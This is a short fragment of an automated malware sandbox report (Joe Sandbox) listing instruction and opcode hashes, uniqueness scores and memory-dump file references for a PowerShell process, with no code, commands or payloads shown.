                                      • Instruction ID: 8fbab240cc89742bcb4e7682545db7e7075e059370059e15fa8fa12372a2a65e
                                      • Opcode Fuzzy Hash: aea9cbd2d73816048cc4defc325b6d5fd571de504d5c21790c552a3858797b3b
                                      • Instruction Fuzzy Hash: 1231A8303142098BF769EB2C9D9967A33D2EB89312F31412AA047C3292DF2CDC07DB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 57141b6d7e82af90fc252f8a6aff855dd69fc072bb2936abf4c2cedabf69c664
                                      • Instruction ID: 097966f7f1f7e7a8403cbeaa38655d6cc97e807566f797c6414231572198ad21
                                      • Opcode Fuzzy Hash: 57141b6d7e82af90fc252f8a6aff855dd69fc072bb2936abf4c2cedabf69c664
                                      • Instruction Fuzzy Hash: 4111C830718A598FDB58DB5CD44872AB7E5FBA8351F21042EE84DC32A0DA74CD41CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%